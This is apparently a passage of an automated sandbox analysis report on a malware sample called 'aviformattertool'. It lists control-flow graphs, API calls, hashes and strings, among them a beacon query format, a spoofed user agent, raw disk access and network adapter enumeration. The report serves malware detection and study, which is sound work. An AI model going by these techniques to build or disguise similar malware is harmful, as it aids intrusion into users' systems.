2a17410-2a17434 call 2a24a70 call 2a1442e 275->282 279->275 280->275 282->258 296 2a1743a-2a17468 RtlEnterCriticalSection RtlLeaveCriticalSection call 2a222bc 282->296 283->272 288 2a17397-2a173bd InternetReadFile 284->288 293 2a173c8-2a173cf InternetCloseHandle 288->293 294 2a173bf-2a173c6 288->294 293->283 294->288 299 2a1746a-2a1747c call 2a222bc 296->299 300 2a174be-2a174d9 call 2a222bc 296->300 299->300 307 2a1747e-2a17490 call 2a222bc 299->307 305 2a17793-2a177a5 call 2a222bc 300->305 306 2a174df-2a174e1 300->306 314 2a177a7-2a177a9 305->314 315 2a177ee-2a17800 call 2a222bc 305->315 306->305 309 2a174e7-2a17599 call 2a22f2c RtlEnterCriticalSection RtlLeaveCriticalSection call 2a24a70 * 5 call 2a1442e * 2 306->309 307->300 317 2a17492-2a174a4 call 2a222bc 307->317 372 2a175d6 309->372 373 2a1759b-2a1759d 309->373 314->315 318 2a177ab-2a177e9 call 2a24a70 RtlEnterCriticalSection RtlLeaveCriticalSection 314->318 328 2a17821-2a17833 call 2a222bc 315->328 329 2a17802-2a17810 call 2a16246 call 2a16354 315->329 317->300 330 2a174a6-2a174b8 call 2a222bc 317->330 318->258 340 2a17b51-2a17b63 call 2a222bc 328->340 341 2a17839-2a1783b 328->341 343 2a17815-2a1781c call 2a1645f 329->343 330->258 330->300 340->258 353 2a17b69-2a17b97 call 2a22f2c call 2a24a70 call 2a1442e 340->353 341->340 345 2a17841-2a17858 call 2a1442e 341->345 343->258 345->258 357 2a1785e-2a1792c call 2a22398 call 2a11ba7 345->357 379 2a17ba0-2a17ba7 call 2a22ef4 353->379 380 2a17b99-2a17b9b call 2a153df 353->380 370 2a17933-2a17954 RtlEnterCriticalSection 357->370 371 2a1792e call 2a1143f 357->371 376 2a17960-2a179c4 RtlLeaveCriticalSection call 2a13c67 call 2a13d7e call 2a182bb 370->376 377 2a17956-2a1795d 370->377 371->370 381 2a175da-2a17608 call 2a22f2c call 2a24a70 call 2a1442e 372->381 373->372 378 2a1759f-2a175b1 call 2a222bc 373->378 404 2a17b38-2a17b4c call 2a18f83 376->404 405 2a179ca-2a17a12 call 2a1a6a5 376->405 377->376 378->372 393 2a175b3-2a175d4 call 2a1442e 378->393 379->258 380->379 402 2a17649-2a17652 call 2a22ef4 381->402 403 2a1760a-2a17619 call 2a23566 381->403 393->381 414 2a17789-2a1778c 402->414 415 2a17658-2a17670 call 2a23acc 402->415 403->402 416 2a1761b 403->416 404->258 417 2a17b02-2a17b33 call 2a1836a call 2a133b2 405->417 418 2a17a18-2a17a1f 405->418 414->305 428 2a17672-2a1767a call 2a196b7 415->428 429 2a1767c 415->429 421 2a17620-2a17632 call 2a227d0 416->421 417->404 419 2a17a22-2a17a27 418->419 419->419 423 2a17a29-2a17a74 call 2a1a6a5 419->423 435 2a17634 421->435 436 2a17637-2a17647 call 2a23566 421->436 423->417 437 2a17a7a-2a17a80 423->437 434 2a1767e-2a17720 call 2a1a7cf call 2a13863 call 2a151ab call 2a13863 call 2a1aa75 call 2a1ab8f 428->434 429->434 459 2a17725-2a17736 434->459 435->436 436->402 436->421 441 2a17a83-2a17a88 437->441 441->441 444 2a17a8a-2a17ac5 call 2a1a6a5 441->444 444->417 451 2a17ac7-2a17afb call 2a1d097 444->451 455 2a17b00-2a17b01 451->455 455->417 460 2a17738 call 2a1380b 459->460 461 2a1773d-2a17768 Sleep call 2a21870 459->461 460->461 465 2a17774-2a17782 461->465 466 2a1776a-2a17773 call 2a14100 461->466 465->414 467 2a17784 call 2a1380b 465->467 466->465 467->414
                                                                                                                                                          APIs
                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(02A471CC), ref: 02A1650B
                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02A16522
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A1652B
                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02A1653A
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A1653D
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 02A16549
                                                                                                                                                            • Part of subcall function 02A160D8: _malloc.LIBCMT ref: 02A160E6
                                                                                                                                                          • GetVersionExA.KERNEL32(02A47030), ref: 02A16576
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165A2
                                                                                                                                                            • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
                                                                                                                                                            • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
                                                                                                                                                            • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165B2
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165BD
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165C8
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165D3
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165DE
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165E9
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165F8
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02A1660F
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A16618
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A16627
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A1662A
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A16635
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A16638
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16672
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A1667F
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166A3
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166B1
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166B8
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166DE
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02A166F1
                                                                                                                                                          • Sleep.KERNELBASE ref: 02A166FF
                                                                                                                                                          • _malloc.LIBCMT ref: 02A1670B
                                                                                                                                                          • _malloc.LIBCMT ref: 02A16718
                                                                                                                                                          • Sleep.KERNELBASE(0000EA60), ref: 02A16759
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16764
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A16775
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                                                                          • String ID: ?uf$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                                                                          • API String ID: 4273019447-74475266
                                                                                                                                                          • Opcode ID: 2a638af842b7502c3ad5487126a90bf1affb9059814606a29544840468e4b559
                                                                                                                                                          • Instruction ID: 095da4c89d3d5ddd24b24f6c0ac256b8c36907aab591faef72017b6398f35166
                                                                                                                                                          • Opcode Fuzzy Hash: 2a638af842b7502c3ad5487126a90bf1affb9059814606a29544840468e4b559
                                                                                                                                                          • Instruction Fuzzy Hash: E37192B1D88350AFE311AF749D49B1BBBE9EF8A710F01081AF94597280DFB49815CF96
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 572 401b4b-401b68 LoadLibraryA 573 401c21-401c25 572->573 574 401b6e-401b7f GetProcAddress 572->574 575 401b85-401b8e 574->575 576 401c18-401c1b FreeLibrary 574->576 577 401b95-401ba5 GetAdaptersInfo 575->577 576->573 578 401ba7-401bb0 577->578 579 401bdb-401be3 577->579 580 401bc1-401bd7 call 402cd0 call 4018cc 578->580 581 401bb2-401bb6 578->581 582 401be5-401beb call 402cb6 579->582 583 401bec-401bf0 579->583 580->579 581->579 586 401bb8-401bbf 581->586 582->583 584 401bf2-401bf6 583->584 585 401c15-401c17 583->585 584->585 589 401bf8-401bfb 584->589 585->576 586->580 586->581 592 401c06-401c13 call 402ca8 589->592 593 401bfd-401c03 589->593 592->577 592->585 593->592
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                                                                          • API String ID: 514930453-3667123677
                                                                                                                                                          • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                                                                                                          • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                                                                                                          • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                                                                                                          • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1F927 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 869 2a1f927-2a1f94a LoadLibraryA 870 2a1f950-2a1f95e GetProcAddress 869->870 871 2a1fa0a-2a1fa11 869->871 872 2a1fa03-2a1fa04 FreeLibrary 870->872 873 2a1f964-2a1f974 870->873 872->871 874 2a1f976-2a1f982 GetAdaptersInfo 873->874 875 2a1f984 874->875 876 2a1f9ba-2a1f9c2 874->876 877 2a1f986-2a1f98d 875->877 878 2a1f9c4-2a1f9ca call 2a23728 876->878 879 2a1f9cb-2a1f9d0 876->879 880 2a1f997-2a1f99f 877->880 881 2a1f98f-2a1f993 877->881 878->879 883 2a1f9d2-2a1f9d5 879->883 884 2a1f9fe-2a1fa02 879->884 886 2a1f9a2-2a1f9a7 880->886 881->877 885 2a1f995 881->885 883->884 888 2a1f9d7-2a1f9dc 883->888 884->872 885->876 886->886 891 2a1f9a9-2a1f9b6 call 2a1f676 886->891 889 2a1f9e9-2a1f9f4 call 2a23acc 888->889 890 2a1f9de-2a1f9e6 888->890 889->884 896 2a1f9f6-2a1f9f9 889->896 890->889 891->876 896->874
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02A1F93D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02A1F956
                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02A1F97B
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 02A1FA04
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                                                                          • API String ID: 514930453-3114217049
                                                                                                                                                          • Opcode ID: c31dff395d211fac50435a8e15a07cd69ca15e9eadda8ac2715c53d28769045b
                                                                                                                                                          • Instruction ID: f5d0cfc5c3a0da0b133cbd4adc62d0b7eca805a0859187e344afe3313ca5a98e
                                                                                                                                                          • Opcode Fuzzy Hash: c31dff395d211fac50435a8e15a07cd69ca15e9eadda8ac2715c53d28769045b
                                                                                                                                                          • Instruction Fuzzy Hash: 9521FB71E00389AFDB10EBA8DCC06EEBBF9AF05320F1441A5E445E7604DF348945CBA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1F823 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 954 2a1f823-2a1f84e CreateFileA 955 2a1f854-2a1f869 954->955 956 2a1f91f-2a1f926 954->956 957 2a1f86c-2a1f88e DeviceIoControl 955->957 958 2a1f890-2a1f898 957->958 959 2a1f8c7-2a1f8cf 957->959 962 2a1f8a1-2a1f8a6 958->962 963 2a1f89a-2a1f89f 958->963 960 2a1f8d1-2a1f8d7 call 2a23728 959->960 961 2a1f8d8-2a1f8da 959->961 960->961 965 2a1f915-2a1f91e FindCloseChangeNotification 961->965 966 2a1f8dc-2a1f8df 961->966 962->959 967 2a1f8a8-2a1f8b0 962->967 963->959 965->956 969 2a1f8e1-2a1f8ea GetLastError 966->969 970 2a1f8fb-2a1f908 call 2a23acc 966->970 971 2a1f8b3-2a1f8b8 967->971 969->965 972 2a1f8ec-2a1f8ef 969->972 970->965 978 2a1f90a-2a1f910 970->978 971->971 974 2a1f8ba-2a1f8c6 call 2a1f676 971->974 972->970 975 2a1f8f1-2a1f8f8 972->975 974->959 975->970 978->957
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02A1F842
                                                                                                                                                          • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02A1F880
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A1F8E1
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 02A1F918
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                                                          • String ID: \\.\PhysicalDrive0
                                                                                                                                                          • API String ID: 3786717961-1180397377
                                                                                                                                                          • Opcode ID: 211b8edfd6c571aacd99536fc8a8c44edfa20a7fe596f691645f8b387e3359fa
                                                                                                                                                          • Instruction ID: 9b3468094b5d3521a6f1e9e2e2211bb4af05456913498095249451124aeba658
                                                                                                                                                          • Opcode Fuzzy Hash: 211b8edfd6c571aacd99536fc8a8c44edfa20a7fe596f691645f8b387e3359fa
                                                                                                                                                          • Instruction Fuzzy Hash: CC31C071D0035AAFDF24DFA4D884AAEBBB9FF05764F24416AE505A3680CB705A05CB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 980 401a4f-401a77 CreateFileA 981 401b45-401b4a 980->981 982 401a7d-401a91 980->982 983 401a98-401ac0 DeviceIoControl 982->983 984 401ac2-401aca 983->984 985 401af3-401afb 983->985 986 401ad4-401ad9 984->986 987 401acc-401ad2 984->987 988 401b04-401b07 985->988 989 401afd-401b03 call 402cb6 985->989 986->985 990 401adb-401af1 call 402cd0 call 4018cc 986->990 987->985 992 401b09-401b0c 988->992 993 401b3a-401b44 FindCloseChangeNotification 988->993 989->988 990->985 996 401b27-401b34 call 402ca8 992->996 997 401b0e-401b17 GetLastError 992->997 993->981 996->983 996->993 997->993 1000 401b19-401b1c 997->1000 1000->996 1001 401b1e-401b24 1000->1001 1001->996
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                                                          • String ID: \\.\PhysicalDrive0
                                                                                                                                                          • API String ID: 3786717961-1180397377
                                                                                                                                                          • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                                                                                                          • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                                                                                                          • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                                                                                                          • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A11CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A11D11
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A11D23
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A11D59
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A11D6B
                                                                                                                                                          • __beginthreadex.LIBCMT ref: 02A11DB1
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A11DC6
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A11DDD
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A11DEC
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A11E14
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02A11E1B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                                                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                                                                          • API String ID: 4246062733-3017686385
                                                                                                                                                          • Opcode ID: b5cfc11a0330b2099b58e4293af47ca677a17697ba85c2d086ef1e6820248ba1
                                                                                                                                                          • Instruction ID: aba73c35b2ce555708359ea9c92bea43c52cf6548dfa95c01b730eeb4fdeda14
                                                                                                                                                          • Opcode Fuzzy Hash: b5cfc11a0330b2099b58e4293af47ca677a17697ba85c2d086ef1e6820248ba1
                                                                                                                                                          • Instruction Fuzzy Hash: 89316BB1A403119FD700EF24CC88B2BBBA5EF85764F104969F9599B290DF709949CF92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A14E18 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A14E1D
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A14E49
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A14E55
                                                                                                                                                            • Part of subcall function 02A14C7F: __EH_prolog.LIBCMT ref: 02A14C84
                                                                                                                                                            • Part of subcall function 02A14C7F: InterlockedExchange.KERNEL32(?,00000000), ref: 02A14D84
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A14F25
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A14F2B
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A14F32
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A14F38
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A15139
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A1513F
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A1514A
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A15153
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2062355503-0
                                                                                                                                                          • Opcode ID: 9eede100a4286a0b7d8aceee9877cde53c1b9a8aeb32f448e388d6e811751cc6
                                                                                                                                                          • Instruction ID: 4dab5952b90e97f4a50bfa28aa27afef09f36034cc83a9b5dd7c16fcd7921ee3
                                                                                                                                                          • Opcode Fuzzy Hash: 9eede100a4286a0b7d8aceee9877cde53c1b9a8aeb32f448e388d6e811751cc6
                                                                                                                                                          • Instruction Fuzzy Hash: D7B15971D4025DEEEF21DFA4CD90BEDBBB5AF09324F10409AE405A6280DF745A49CF96
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 598 401f64-401f84 FindResourceA 599 401f86-401f9d GetLastError SizeofResource 598->599 600 401f9f-401fa1 598->600 599->600 601 401fa6-401fec LoadResource LockResource GlobalAlloc call 402910 * 2 599->601 602 402096-40209a 600->602 607 401fee-401ff9 601->607 607->607 608 401ffb-402003 GetTickCount 607->608 609 402032-402038 608->609 610 402005-402007 608->610 611 402053-402083 GlobalAlloc call 401c26 609->611 613 40203a-40204a 609->613 610->611 612 402009-40200f 610->612 618 402088-402093 611->618 612->611 615 402011-402023 612->615 616 40204c 613->616 617 40204e-402051 613->617 619 402025 615->619 620 402027-40202a 615->620 616->617 617->611 617->613 618->602 619->620 620->615 621 40202c-40202e 620->621 621->612 622 402030 621->622 622->611
                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 564119183-0
                                                                                                                                                          • Opcode ID: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
                                                                                                                                                          • Instruction ID: 463a3d7b41c8cda22d33258f608925a12b9792281116504224950c64902584c3
                                                                                                                                                          • Opcode Fuzzy Hash: beb4d93e6ab0000654ca0b4ef6e0369b4b44b9707bf6409794ee70763ef4fb7e
                                                                                                                                                          • Instruction Fuzzy Hash: 48315B31A40251AFDB109FB99E489AF7B78EF45344F10807AFE46F7291D6748941C7A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A17BD4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111sleepCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
